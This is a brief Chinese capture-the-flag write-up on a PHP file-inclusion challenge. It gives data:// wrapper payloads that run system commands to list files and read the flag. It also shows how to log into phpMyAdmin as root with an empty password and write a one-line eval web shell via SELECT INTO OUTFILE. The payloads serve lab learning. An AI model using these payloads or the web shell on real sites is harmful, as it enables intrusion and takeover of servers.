打开网页
这个网页会显示变量hello的值,,并且执行变量page中的内容,并且还会替换掉page变量中的php://
因为php://被过滤了,所以要用其他的伪协议,比如data://
所以构造payload
?page=data://text/plain,<?system('ls -l')?>
得到了flag文件的名称
于是构造payload得到flag内容
?page=data://text/plain,<?system('cat fl4gisisish3r3.php')?>
查看源码得到flag
通过御剑扫描后台得到
该网站存在phpmyadmin,使用root,密码为空进入后台
输入一句话木马
select "<?php eval(@$_POST['flag']); ?>" into outfile '/tmp/test.php'
用蚁剑连接
即可得到flag
可以用Php://input绕过过滤,然后在包内添加php命令得到flag